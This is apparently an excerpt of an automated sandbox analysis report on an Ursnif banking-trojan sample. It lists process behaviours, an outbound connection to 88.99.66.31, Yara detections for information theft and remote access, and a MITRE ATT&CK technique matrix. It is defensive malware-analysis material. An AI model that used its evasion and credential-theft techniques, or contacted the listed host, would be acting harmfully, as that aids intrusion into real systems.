            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72E5F519 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72E5F44F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72E5F059 push dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72E21E95 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe | File created: qua.xpi.0.dr
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exe | Network Connect: 88.99.66.31 187
            Source: regsvr32.exe, 00000002.00000002.1192042863.00000000012F0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1192987316.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
            Source: regsvr32.exe, 00000002.00000002.1192042863.00000000012F0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1192987316.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000002.00000002.1192042863.00000000012F0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1192987316.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: Progman
            Source: regsvr32.exe, 00000002.00000002.1192042863.00000000012F0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1192987316.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AB350A cpuid
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72E21BB9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AB350A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72E2177C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match | File source: 00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075739396.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075639616.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075243511.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075382255.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3488, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match | File source: 00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075739396.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075639616.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075243511.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1075382255.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3488, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 31 | Winlogon Helper DLL | Process Injection 12 | Masquerading 11 | Credential Dumping | System Time Discovery 1 | Remote File Copy 3 | Data from Local System | Data Encrypted 1 | Standard Cryptographic Protocol 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Replication Through Removable Media | Scripting 121 | Port Monitors | Accessibility Features | Virtualization/Sandbox Evasion 1 | Network Sniffing | Virtualization/Sandbox Evasion 1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Remote File Copy 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            External Remote Services | Execution through API 1 | Accessibility Features | Path Interception | Process Injection 12 | Input Capture | Process Discovery 1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Drive-by Compromise | Exploitation for Client Execution 1 | System Firmware | DLL Search Order Hijacking | Scripting 121 | Credentials in Files | Account Discovery 1 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol 4 | SIM Card Swap | | Premium SMS Toll Fraud
            Exploit Public-Facing Application | Graphical User Interface 1 | Shortcut Modification | File System Permissions Weakness | File Deletion 1 | Account Manipulation | System Owner/User Discovery 1 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Obfuscated Files or Information 2 | Brute Force | Security Software Discovery 11 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | | Abuse Accessibility Features
            Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | DLL Side-Loading 1 | Two-Factor Authentication Interception | Remote System Discovery 1 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Indicator Blocking | Bash History | File and Directory Discovery 3 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection | Input Prompt | System Information Discovery 46 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet